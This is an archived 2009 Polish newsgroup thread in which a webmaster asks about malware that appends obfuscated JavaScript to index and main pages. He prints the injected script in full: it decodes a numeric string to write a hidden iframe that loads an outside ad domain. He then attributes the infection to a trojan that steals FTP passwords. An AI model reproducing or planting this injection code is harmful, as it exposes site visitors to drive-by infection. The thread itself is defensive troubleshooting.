eGospodarka.pl
eGospodarka.pl poleca

eGospodarka.plGrupypl.internet.polip[ mallware doklejajacy zdalnie kod do stron ]
Ilość wypowiedzi w tym wątku: 3

  • 1. Data: 2009-02-09 10:46:10
    Temat: [ mallware doklejajacy zdalnie kod do stron ]
    Od: Matt Rutkowski <m...@g...com>

    Witam,

    czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
    dokleja zdalnie nastepujacy kod javascript do stron o nazwie
    index.php, index.html, main.html, main.php

    -- kod --

    <!-- ad --><script language="JavaScript">function rkfg(jflq){return
    String.fromCharCode(jflq);}var
    ohhe="0601051021140971091010321151140990610391041161
    1611205804704711511711210111410511111409710012204610
    5110102111047111112105115047063116061049051039032119
    1051001161040610390480390321041011051031041160610390
    4803903211511612110810106103911810511510509810510810
    5116121058032104105100100101110059039062060047105102
    114097109101062";var
    ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=r
    kfg(ohhe.substr
    (qhxk, 3));}window.status='Done';document.write(ifdm);</scr
    ipt>
    <!-- /ad -->

    -- kod --

    w/w kod tworzy ukryta iframe i laczy sie z adresem http://superioradz.info/opis/?t=13

    --
    Matt Rutkowski


  • 2. Data: 2009-02-10 15:40:26
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: elmer radi radisson <r...@s...spam.wireland.org>

    Matt Rutkowski wrote:

    > czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
    > dokleja zdalnie nastepujacy kod javascript do stron o nazwie
    > index.php, index.html, main.html, main.php

    A dokleja dokladnie do plikow tresci statycznej strony, czy moze
    raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.

    A w ogole to pl.comp.security ?



    --

    tajemnicze kręgle w zbożu


  • 3. Data: 2009-02-10 19:47:06
    Temat: Re: [ mallware doklejajacy zdalnie kod do stron ]
    Od: Matt Rutkowski <m...@g...com>

    > A dokleja dokladnie do plikow tresci statycznej strony, czy moze
    > raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.

    - trojan ktory wykrada hasla z popularnych klientow ftp i kolejno
    laczy sie ze strona doklejajac do plikow o nazwie index.php,
    index.html, main.php, main.html statycznie generowany content (kod w
    mailu wyzej)

    - dal sie zauwazyc z racji, ze wielu klientow uzywa szablonow html
    smarty; doklejenie kodu js w niewlasciwym miejscu powoduje uwalenie
    strony


    --
    Matt Rutkowski

strony : [ 1 ]


Szukaj w grupach

Szukaj w grupach

Eksperci egospodarka.pl

1 1 1

Wpisz nazwę miasta, dla którego chcesz znaleźć jednostkę ZUS.

Wzory dokumentów

Bezpłatne wzory dokumentów i formularzy.
Wyszukaj i pobierz za darmo: